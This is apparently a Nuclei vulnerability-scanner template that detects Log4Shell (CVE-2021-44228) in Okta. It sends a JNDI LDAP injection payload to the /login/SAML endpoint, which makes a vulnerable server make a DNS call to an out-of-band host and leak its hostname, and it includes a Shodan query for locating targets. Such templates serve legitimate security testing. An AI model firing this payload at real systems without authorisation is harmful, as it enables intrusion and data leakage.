id: okta-log4j-rce

info:
  name: Okta - Remote Code Execution (Apache Log4j)
  author: shaikhyaser
  severity: critical
  description: |
    Okta is susceptible to Log4j JNDI remote code execution. Okta provides cloud software that helps companies manage and secure user authentication into applications, and for developers to build identity controls into applications, website web services and devices.
  reference:
    - https://sec.okta.com/articles/2021/12/log4shell
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-77
  metadata:
    max-request: 1
    shodan-query: title:"Okta"
  tags: cve,cve2021,rce,jndi,log4j,okta,oast,kev

variables:
  rand1: '{{rand_int(111, 999)}}'
  rand2: '{{rand_int(111, 999)}}'
  str: "{{rand_base(5)}}"

http:
  - raw:
      - |
        GET /login/SAML?=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output

    extractors:
      - type: kval
        kval:
          - interactsh_ip # Print remote interaction IP in output

      - type: regex
        group: 2
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
        part: interactsh_request

      - type: regex
        group: 1
        regex:
          - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
        part: interactsh_request
# digest: 4b0a00483046022100bc882474f76134d6af0f7b38c9d20cbb5d3917f7460342c741912ed616dcbc07022100cb71c9543aafc358c92566c24ea9387e18e8c1f88b6a33d1d4db42e2df7c8ec0:922c64590222798bb761d5b6d8e72950